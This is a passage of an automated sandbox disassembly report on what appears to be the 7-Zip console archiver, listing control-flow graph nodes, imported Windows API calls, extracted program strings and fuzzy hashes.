2164->2183 2184 475a21-475a30 2164->2184 2165->2166 2185 475dfe-475e1a free 2166->2185 2186 475b5a-475b61 2166->2186 2168->2151 2180 475d80-475d9c free 2169->2180 2181 475a8c 2169->2181 2170->2162 2170->2170 2193 475d9e 2180->2193 2194 475dbc-475df9 free call 474610 free * 2 2180->2194 2181->2151 2183->2184 2191 475a17-475a1d 2183->2191 2184->2164 2192 475a32-475a52 2184->2192 2187 475e1c 2185->2187 2188 475e3a-475e77 free call 474610 free * 2 2185->2188 2195 475b63-475b7e 2186->2195 2196 475b80 2186->2196 2197 475e20-475e38 free 2187->2197 2188->2099 2189->2155 2190->2189 2199 475917-47591f 2190->2199 2191->2184 2192->2157 2200 475da2-475dba free 2193->2200 2194->2099 2201 475b88-475bb6 2195->2201 2196->2201 2197->2188 2197->2197 2199->2189 2200->2194 2200->2200 2205 475e7c-475e95 free 2201->2205 2206 475bbc-475bd6 free 2201->2206 2209 475e97 2205->2209 2210 475eb5-475ef4 free call 474610 free * 2 2205->2210 2207 475bff-475c12 free call 474610 2206->2207 2208 475bd8-475bdc 2206->2208 2219 475c17-475c35 free 2207->2219 2211 475bde-475bf5 free 2208->2211 2215 475e9b-475eb3 free 2209->2215 2210->2099 2211->2211 2218 475bf7 2211->2218 2215->2210 2215->2215 2218->2207 2219->2085
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrow$memset
                                              • String ID: can't decompress folder$there is no such archive
                                              • API String ID: 4182836161-2069749860
                                              • Opcode ID: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                              • Instruction ID: 43acdaeba741836c6b5421ed62a26c0a0b420e04f326eaf9e3e75b5c210a5f70
                                              • Opcode Fuzzy Hash: 0531c0556df1e1cc1da6671d873316a8f13ad98ec2fb73028dbba5c41659c69e
                                              • Instruction Fuzzy Hash: 66524A33209AC186CA20DB26E5802EFA764F786B94F409127DF9D57B29DF7CC855CB48
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                              • Instruction ID: 0dbe412f96bf0b17cae2399ead35837e50b5858e72c60917e20793627134925e
                                              • Opcode Fuzzy Hash: 86925bdf96b53b796196216b433522d18a2852d7a9fec4d1aa65d4bf3be89989
                                              • Instruction Fuzzy Hash: D1428F3720AA8086CB20EF26E1906AF7765F38AB88F555417DB4E47B16CF7DC449CB09
                                              APIs
                                              Strings
                                              • Cannot use absolute pathnames for this command, xrefs: 0046138C
                                              • Incorrect Number of benmchmark iterations, xrefs: 00461847
                                              • Unsupported -spf:, xrefs: 00460F7E
                                              • Unsupported command:, xrefs: 00460E57
                                              • The command must be specified, xrefs: 00460DF5
                                              • -ai switch is not supported for this command, xrefs: 004615C3
                                              • Archive name cannot by empty, xrefs: 00461151
                                              • I won't write compressed data to a terminal, xrefs: 00461741
                                              • Only one archive can be created with rename command, xrefs: 004617E1
                                              • I won't write data and program's messages to same stream, xrefs: 004614B3, 00461782
                                              • Cannot find archive name, xrefs: 0046110A
                                              • stdout mode and email mode cannot be combined, xrefs: 00461710
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$free$wcscmp
                                              • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                              • API String ID: 1252877886-1892825451
                                              • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                              • Instruction ID: 29a81ec79fba4d1d886d073583175ebed06e6b0cde7f2d7081218fab63d18cd1
                                              • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                              • Instruction Fuzzy Hash: 7952D1B73046C1A6DB28CB25D1903AEBB61F355748F888017DB9903B22EB7DD5B9C709
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 00461D12
                                              • CloseHandle.KERNEL32 ref: 00461D25
                                              • OpenProcessToken.ADVAPI32 ref: 00461D48
                                              • LookupPrivilegeValueW.ADVAPI32 ref: 00461D70
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00461D93
                                              • CloseHandle.KERNEL32 ref: 00461DA7
                                              • GetLastError.KERNEL32 ref: 00461DB1
                                              • FindCloseChangeNotification.KERNELBASE ref: 00461DC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: Close$HandleProcessToken$AdjustChangeCurrentErrorFindLastLookupNotificationOpenPrivilegePrivilegesValue
                                              • String ID: SeSecurityPrivilege
                                              • API String ID: 2332213979-2333288578
                                              • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                              • Instruction ID: 9212e5137e70a741b791dd49aed5bae6b6c94a5ee3baaebea9025dee84d288c2
                                              • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                              • Instruction Fuzzy Hash: 891154B2204B40C2DA00CB12F95536FB3A6FBC4785F980423EA8B82A64DF3CD859C715
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0045AC84
                                              • OpenProcessToken.ADVAPI32 ref: 0045AC95
                                              • LookupPrivilegeValueW.ADVAPI32 ref: 0045ACA9
                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,FFFFFFFF,?,0045F928), ref: 0045ACE0
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0045F928), ref: 0045ACEA
                                              • FindCloseChangeNotification.KERNELBASE ref: 0045ACFA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ProcessToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationOpenPrivilegePrivilegesValue
                                              • String ID:
                                              • API String ID: 2838110999-0
                                              • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                              • Instruction ID: f7b72b1d29296cc0c286fbd9a6f22d1325700b121594ff7ab478d727160d294c
                                              • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                              • Instruction Fuzzy Hash: A9014CA261468187DB108FA4F88579B73A1F784B86F545136EF8A82A54CF3CC89DCB44
                                              APIs
                                                • Part of subcall function 0045794C: FindClose.KERNELBASE ref: 0045795E
                                              • FindFirstFileW.KERNELBASE ref: 004579BA
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              • FindFirstFileW.KERNELBASE ref: 004579FA
                                              • free.MSVCRT ref: 00457A08
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: Find$FileFirstfree$Closememmove
                                              • String ID:
                                              • API String ID: 2921071498-0
                                              • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                              • Instruction ID: 46a0f4631c40aafaadf3623f13c88c4023f306b3f1478d762d6e19b8bd14fe86
                                              • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                              • Instruction Fuzzy Hash: 08212B76208A8086DB11DF25F44035E6361F78A7B9F544326EEA9477DADF3CCA09C704
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: hG$Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                              • API String ID: 0-4258919771
                                              • Opcode ID: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                              • Instruction ID: 87a2f5e97be487399f551e09536c55482036a34b319d66e24569b3afc3f1c4ae
                                              • Opcode Fuzzy Hash: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
                                              • Instruction Fuzzy Hash: B0038532245A8182CA34EB26E4502AFB721F7C6BC5F554117DB9E47B25EF7CC885CB0A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1016 49950d-499510 1017 499a40-499a8e call 452130 1016->1017 1018 499516-499529 call 45ed74 1016->1018 1028 499a90-499aa0 call 453314 1017->1028 1029 499aa2 1017->1029 1024 49952f-499537 1018->1024 1025 499820-499828 1018->1025 1030 499539-499541 1024->1030 1031 499557-4995d5 call 493230 call 453208 1024->1031 1026 49982e-49983f call 4978a8 1025->1026 1027 4999e4-4999ee 1025->1027 1048 49984c-49994d call 496990 call 452bc8 call 477880 call 452bc8 call 452cdc call 496c04 1026->1048 1049 499841-499845 1026->1049 1034 499a20-499a3f _CxxThrowException 1027->1034 1035 4999f0-499a1b call 452300 fputs * 2 call 452300 1027->1035 1032 499aa5-499ac8 call 45b8f0 call 452130 1028->1032 1029->1032 1030->1031 1038 499543-499552 call 453518 1030->1038 1056 4995e5 1031->1056 1057 4995d7-4995df 1031->1057 1059 499aca-499ada call 453314 1032->1059 1060 499adc 1032->1060 1034->1017 1035->1034 1038->1031 1101 49994f 1048->1101 1102 499980-4999df free * 5 call 496a20 1048->1102 1049->1048 1062 4995e8-499631 call 453404 call 49780c 1056->1062 1057->1056 1061 4995e1-4995e3 1057->1061 1065 499adf-499c8b call 45b8f0 call 452130 1059->1065 1060->1065 1061->1062 1079 49963e-49964d 1062->1079 1080 499633-499637 1062->1080 1089 499c9a 1065->1089 1090 499c8d-499c98 call 497414 1065->1090 1081 49964f-499657 1079->1081 1082 499663 1079->1082 1080->1079 1081->1082 1086 499659-499661 1081->1086 1087 49966b-49972c call 453404 call 496990 call 452bc8 1082->1087 1086->1087 1117 49972f call 4899b8 1087->1117 1094 499c9d-499ca8 1089->1094 1090->1094 1098 499caa-499cb3 1094->1098 1099 499cb4-499d77 call 453404 1094->1099 1098->1099 1115 499d79-499d7d 1099->1115 1116 499d83-499e8a call 4971ec call 453404 call 45ef70 call 453208 call 476be0 1099->1116 1106 499953-499969 1101->1106 1113 49a5ad-49a5b5 1102->1113 1111 49997b-49997e 1106->1111 1112 49996b-499976 free * 2 1106->1112 1111->1102 1111->1106 1112->1111 1118 49a5c5-49a5c8 1113->1118 1119 49a5b7-49a5be 1113->1119 1115->1116 1159 499e8c-499eb4 call 476e08 1116->1159 1160 499ed2-499f44 call 475458 1116->1160 1121 499734-49973f 1117->1121 1123 49a5ca-49a5e6 _CxxThrowException 1118->1123 1124 49a5e7-49a603 free 1118->1124 1119->1118 1122 49a5c0 1119->1122 1129 499741-49974b call 49b1c8 1121->1129 1130 499750-499798 call 496c04 1121->1130 1131 49a5c0 call 4966a8 1122->1131 1123->1124 1127 49a605 1124->1127 1128 49a626-49a637 free call 47a13c 1124->1128 1133 49a609-49a624 free 1127->1133 1139 49a63c-49a675 call 497080 call 45182c call 497f50 1128->1139 1129->1130 1140 4997cb-49981b free * 3 call 496a20 free call 49b310 1130->1140 1141 49979a 1130->1141 1131->1118 1133->1128 1133->1133 1163 49a6a8-49a6c9 free 1139->1163 1164 49a677 1139->1164 1140->1113 1144 49979e-4997b4 1141->1144 1148 4997c6-4997c9 1144->1148 1149 4997b6-4997c1 free * 2 1144->1149 1148->1140 1148->1144 1149->1148 1159->1160 1170 499eb6-499ed1 _CxxThrowException 1159->1170 1169 499f49-499f53 1160->1169 1168 49a67b-49a691 1164->1168 1171 49a6a3-49a6a6 1168->1171 1172 49a693-49a69e free * 2 1168->1172 1173 499f60-499f68 1169->1173 1174 499f55-499f5b call 49b1c8 1169->1174 1170->1160 1171->1163 1171->1168 1172->1171 1176 499f6a-499f74 1173->1176 1177 499fbd-499fca 1173->1177 1174->1173 1178 499fb1-499fb9 1176->1178 1179 499f76-499fac call 452300 fputs call 452300 call 452320 call 452300 1176->1179 1180 49a02c-49a033 1177->1180 1181 499fcc-499fcf call 452300 1177->1181 1178->1177 1179->1178 1183 49a063-49a06a 1180->1183 1184 49a035-49a03a 1180->1184 1190 499fd4-499fdc 1181->1190 1188 49a06c-49a071 1183->1188 1189 49a09e-49a0a1 1183->1189 1184->1183 1187 49a03c-49a05e fputs call 4526a0 call 452300 1184->1187 1187->1183 1191 49a114-49a11b 1188->1191 1192 49a077-49a099 fputs call 4526a0 call 452300 1188->1192 1189->1191 1194 49a0a3-49a0aa 1189->1194 1190->1180 1193 499fde-49a027 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1190->1193 1199 49a11d-49a122 1191->1199 1200 49a15c-49a15f 1191->1200 1192->1189 1193->1180 1201 49a0ac-49a0ce fputs call 4526a0 call 452300 1194->1201 1202 49a0d3-49a0da 1194->1202 1207 49a161 1199->1207 1208 49a124-49a133 call 452300 1199->1208 1200->1207 1212 49a16c-49a16f 1200->1212 1201->1202 1202->1191 1211 49a0dc-49a0eb call 452300 1202->1211 1207->1212 1208->1207 1233 49a135-49a157 fputs call 4526a0 call 452300 1208->1233 1211->1191 1234 49a0ed-49a10f fputs call 4526a0 call 452300 1211->1234 1220 49a320-49a50a free * 2 call 476b58 free call 497968 1212->1220 1221 49a175-49a17c 1212->1221 1265 49a53d-49a559 free 1220->1265 1266 49a50c 1220->1266 1228 49a182-49a189 1221->1228 1229 49a2e7-49a2f6 call 452300 1221->1229 1228->1229 1230 49a18f-49a192 1228->1230 1229->1220 1247 49a2f8-49a31f fputs call 4526a0 call 452300 1229->1247 1230->1220 1237 49a198-49a1a3 1230->1237 1233->1200 1234->1191 1244 49a1d5-49a1de 1237->1244 1245 49a1a5-49a1cd fputs call 4526a0 call 452300 1237->1245 1251 49a1e0-49a1e3 1244->1251 1252 49a1f3-49a223 fputs call 4526a0 call 452300 1244->1252 1245->1244 1247->1220 1251->1252 1257 49a1e5-49a1ed 1251->1257 1262 49a275-49a2c3 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1252->1262 1280 49a225-49a270 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1252->1280 1257->1252 1257->1262 1292 49a2c8-49a2cb 1262->1292 1272 49a55b 1265->1272 1273 49a58c-49a599 free 1265->1273 1271 49a510-49a526 1266->1271 1276 49a538-49a53b 1271->1276 1277 49a528-49a533 free * 2 1271->1277 1278 49a55f-49a575 1272->1278 1273->1113 1276->1265 1276->1271 1277->1276 1282 49a587-49a58a 1278->1282 1283 49a577-49a582 free * 2 1278->1283 1280->1262 1282->1273 1282->1278 1283->1282 1292->1220 1293 49a2cd-49a2e5 call 452300 call 49291c 1292->1293 1293->1220
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrowfputs$fputc
                                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                              • API String ID: 1639683984-435538426
                                              • Opcode ID: c4df28724ffdc7e0842be743f763cc0a922e670076b0a14cd413980cb4f2623f
                                              • Instruction ID: 831cad4a15a3d4a66f04a0de7b7347650197d595b7461d7396fdb6c7328904b8
                                              • Opcode Fuzzy Hash: c4df28724ffdc7e0842be743f763cc0a922e670076b0a14cd413980cb4f2623f
                                              • Instruction Fuzzy Hash: 87725672309AC195CA30EB26E8903DEB7A0F786784F44412BDA9D43B1ADF7CC559CB49

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1833 499b5d-499b5f 1834 499b79-499c1f call 49057c call 453208 call 4738e8 free 1833->1834 1835 499b61-499b74 fputs call 452300 1833->1835 1843 499c21-499c2b call 49b1c8 1834->1843 1844 499c30-499c33 1834->1844 1835->1834 1843->1844 1845 499c35-499c3c 1844->1845 1846 499c54-499c8b call 49b310 call 452130 1844->1846 1845->1846 1848 499c3e-499c4e call 490994 1845->1848 1857 499c9a 1846->1857 1858 499c8d-499c98 call 497414 1846->1858 1852 499c53 1848->1852 1852->1846 1860 499c9d-499ca8 1857->1860 1858->1860 1862 499caa-499cb3 1860->1862 1863 499cb4-499d77 call 453404 1860->1863 1862->1863 1867 499d79-499d7d 1863->1867 1868 499d83-499e8a call 4971ec call 453404 call 45ef70 call 453208 call 476be0 1863->1868 1867->1868 1879 499e8c-499eb4 call 476e08 1868->1879 1880 499ed2-499f53 call 475458 1868->1880 1879->1880 1885 499eb6-499ed1 _CxxThrowException 1879->1885 1886 499f60-499f68 1880->1886 1887 499f55-499f5b call 49b1c8 1880->1887 1885->1880 1889 499f6a-499f74 1886->1889 1890 499fbd-499fca 1886->1890 1887->1886 1891 499fb1-499fb9 1889->1891 1892 499f76-499fac call 452300 fputs call 452300 call 452320 call 452300 1889->1892 1893 49a02c-49a033 1890->1893 1894 499fcc-499fcf call 452300 1890->1894 1891->1890 1892->1891 1896 49a063-49a06a 1893->1896 1897 49a035-49a03a 1893->1897 1903 499fd4-499fdc 1894->1903 1901 49a06c-49a071 1896->1901 1902 49a09e-49a0a1 1896->1902 1897->1896 1900 49a03c-49a05e fputs call 4526a0 call 452300 1897->1900 1900->1896 1904 49a114-49a11b 1901->1904 1905 49a077-49a099 fputs call 4526a0 call 452300 1901->1905 1902->1904 1907 49a0a3-49a0aa 1902->1907 1903->1893 1906 499fde-49a027 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1903->1906 1912 49a11d-49a122 1904->1912 1913 49a15c-49a15f 1904->1913 1905->1902 1906->1893 1914 49a0ac-49a0ce fputs call 4526a0 call 452300 1907->1914 1915 49a0d3-49a0da 1907->1915 1920 49a161 1912->1920 1921 49a124-49a133 call 452300 1912->1921 1913->1920 1925 49a16c-49a16f 1913->1925 1914->1915 1915->1904 1924 49a0dc-49a0eb call 452300 1915->1924 1920->1925 1921->1920 1946 49a135-49a157 fputs call 4526a0 call 452300 1921->1946 1924->1904 1947 49a0ed-49a10f fputs call 4526a0 call 452300 1924->1947 1933 49a320-49a50a free * 2 call 476b58 free call 497968 1925->1933 1934 49a175-49a17c 1925->1934 1978 49a53d-49a559 free 1933->1978 1979 49a50c 1933->1979 1941 49a182-49a189 1934->1941 1942 49a2e7-49a2f6 call 452300 1934->1942 1941->1942 1943 49a18f-49a192 1941->1943 1942->1933 1960 49a2f8-49a31f fputs call 4526a0 call 452300 1942->1960 1943->1933 1950 49a198-49a1a3 1943->1950 1946->1913 1947->1904 1957 49a1d5-49a1de 1950->1957 1958 49a1a5-49a1cd fputs call 4526a0 call 452300 1950->1958 1964 49a1e0-49a1e3 1957->1964 1965 49a1f3-49a223 fputs call 4526a0 call 452300 1957->1965 1958->1957 1960->1933 1964->1965 1970 49a1e5-49a1ed 1964->1970 1975 49a275-49a2c3 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1965->1975 1994 49a225-49a270 fputs call 4526a0 call 452300 fputs call 4526a0 call 452300 1965->1994 1970->1965 1970->1975 2017 49a2c8-49a2cb 1975->2017 1985 49a55b 1978->1985 1986 49a58c-49a5b5 free 1978->1986 1984 49a510-49a526 1979->1984 1989 49a538-49a53b 1984->1989 1990 49a528-49a533 free * 2 1984->1990 1991 49a55f-49a575 1985->1991 1998 49a5c5-49a5c8 1986->1998 1999 49a5b7-49a5be 1986->1999 1989->1978 1989->1984 1990->1989 1996 49a587-49a58a 1991->1996 1997 49a577-49a582 free * 2 1991->1997 1994->1975 1996->1986 1996->1991 1997->1996 2004 49a5ca-49a5e6 _CxxThrowException 1998->2004 2005 49a5e7-49a603 free 1998->2005 1999->1998 2002 49a5c0 call 4966a8 1999->2002 2002->1998 2004->2005 2006 49a605 2005->2006 2007 49a626-49a637 free call 47a13c 2005->2007 2011 49a609-49a624 free 2006->2011 2016 49a63c-49a675 call 497080 call 45182c call 497f50 2007->2016 2011->2007 2011->2011 2031 49a6a8-49a6c9 free 2016->2031 2032 49a677 2016->2032 2017->1933 2018 49a2cd-49a2e5 call 452300 call 49291c 2017->2018 2018->1933 2034 49a67b-49a691 2032->2034 2035 49a6a3-49a6a6 2034->2035 2036 49a693-49a69e free * 2 2034->2036 2035->2031 2035->2034 2036->2035
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputcfputsfree
                                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                              • API String ID: 2822829076-727241755
                                              • Opcode ID: 30ce0cc10c5d65c57f31b3facee741759dcc9d7206f1aafb72cff422ad37eccd
                                              • Instruction ID: 1ad52929fde83486a32e1443549e7ba4bd45aca89806e7c357240cd1c39426bb
                                              • Opcode Fuzzy Hash: 30ce0cc10c5d65c57f31b3facee741759dcc9d7206f1aafb72cff422ad37eccd
                                              • Instruction Fuzzy Hash: CA222672309AC191CA34EB26E9903DEA7A0F786B84F44402BDA9D43B19DF7CC569C749

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2649 47a180-47a1e9 GetProcAddress * 2 2650 47a214-47a22a GetProcAddress 2649->2650 2651 47a1eb-47a1fe GetProcAddress 2649->2651 2652 47a233-47a23e 2650->2652 2653 47a22c-47a22e 2650->2653 2651->2652 2654 47a200-47a20d 2651->2654 2656 47a244-47a2f0 call 453208 call 478928 2652->2656 2657 47a729 2652->2657 2655 47a72b-47a73e 2653->2655 2654->2652 2661 47a20f 2654->2661 2664 47a2f6-47a30a 2656->2664 2665 47a648 2656->2665 2657->2655 2661->2655 2667 47a31c-47a321 2664->2667 2668 47a30c-47a31a 2664->2668 2666 47a718-47a727 call 4794a8 2665->2666 2666->2655 2672 47a328-47a32b 2667->2672 2668->2672 2673 47a32d-47a345 call 45ae2c call 4794a8 2672->2673 2674 47a34a-47a350 2672->2674 2690 47a634-47a63d 2673->2690 2675 47a352-47a36a call 45ae2c call 4794a8 2674->2675 2676 47a36f-47a37d SysStringByteLen 2674->2676 2675->2690 2680 47a383-47a3e3 call 45ae2c * 2 call 453208 * 2 call 478928 2676->2680 2681 47a64d-47a65d call 45ae2c 2676->2681 2701 47a662-47a678 free * 2 2680->2701 2702 47a3e9-47a40c call 478928 2680->2702 2681->2666 2690->2656 2693 47a643 2690->2693 2693->2657 2701->2666 2705 47a412-47a424 call 479d98 2702->2705 2706 47a67d-47a693 free * 2 2702->2706 2708 47a429-47a485 call 4787a8 call 478860 2705->2708 2706->2666 2713 47a48b-47a49c 2708->2713 2714 47a698-47a6ae free * 2 2708->2714 2715 47a4ee-47a51b call 479380 2713->2715 2716 47a49e-47a4a5 2713->2716 2714->2666 2722 47a521-47a526 2715->2722 2723 47a6b0-47a6d1 free * 3 2715->2723 2717 47a4ab-47a4d9 call 4787a8 2716->2717 2724 47a4e5-47a4ec 2717->2724 2725 47a4db-47a4de 2717->2725 2726 47a541-47a564 call 479380 2722->2726 2727 47a528-47a53f call 4798d4 2722->2727 2723->2666 2724->2715 2724->2717 2725->2724 2732 47a6d3-47a6f4 free * 3 2726->2732 2733 47a56a-47a57e call 47a034 2726->2733 2734 47a583-47a5b7 call 478860 2727->2734 2732->2666 2733->2734 2738 47a6f6-47a715 free * 3 2734->2738 2739 47a5bd-47a5c0 2734->2739 2738->2666 2740 47a5c2-47a5ca 2739->2740 2741 47a5cf-47a5e4 call 452130 